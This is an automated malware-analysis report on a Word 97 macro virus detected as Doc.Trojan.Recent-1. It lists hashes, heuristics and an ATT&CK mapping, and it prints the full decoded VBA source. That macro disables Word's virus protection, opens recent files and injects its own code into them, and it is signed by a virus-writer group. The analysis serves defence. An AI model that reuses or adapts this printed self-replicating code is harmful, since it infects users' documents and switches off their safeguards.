Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4786cc5fbda01c9f…

MALICIOUS

Office (OLE)

Size: 27.5 KB
Created: 1999-06-20 08:49:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: beb26569bc1a0158cb65b69beb62178d
SHA-1: a17610f9ccba9e975e898384c76e0e56ef89056f
SHA-256: 4786cc5fbda01c9f434cee2386ebc2f38040c124ee55bff4f93be83c259b584a
Risk Score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros that are designed to minimize the Word application window and potentially infect other recently opened documents. The macro code includes a string 'Strife' which is likely a marker or name associated with the malware. The ClamAV detection 'Doc.Trojan.Recent-1' further supports the malicious nature and the observed behavior of spreading to recent files.

Heuristics (2)

  • ClamAV: Doc.Trojan.Recent-1 [severity: critical, rule: CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Recent-1
  • VBA macros detected [severity: medium, rule: OLE_VBA_MACROS]
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 847 bytes
SHA-256: 564174068ee65611a752d35ec3e4b454be6b3910cf2c753e2ece1309281ace01
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Close()
Application.WindowState = wdWindowStateMinimize
Set a = MacroContainer.VBProject: Options.VirusProtection = False
Set ab = a.vbcomponents(1): Set abc = ab.codemodule
For i = 1 To RecentFiles.Maximum
RecentFiles(i).Open
Dn = RecentFiles(1).Name
Set s = Documents(Dn): Set nh = s.VBProject.vbcomponents(1).codemodule
If nh.countoflines < 5 Then
nh.addfromstring abc.lines(1, abc.countoflines)
s.Save
End If
Next
If Day(Now()) = Int(Rnd * 31) + 1 Then MsgBox "¿Strife?", 64
Application.Quit
End Sub

Rem Another macro virus by Jack Twoflower LineZerØ/Metaphase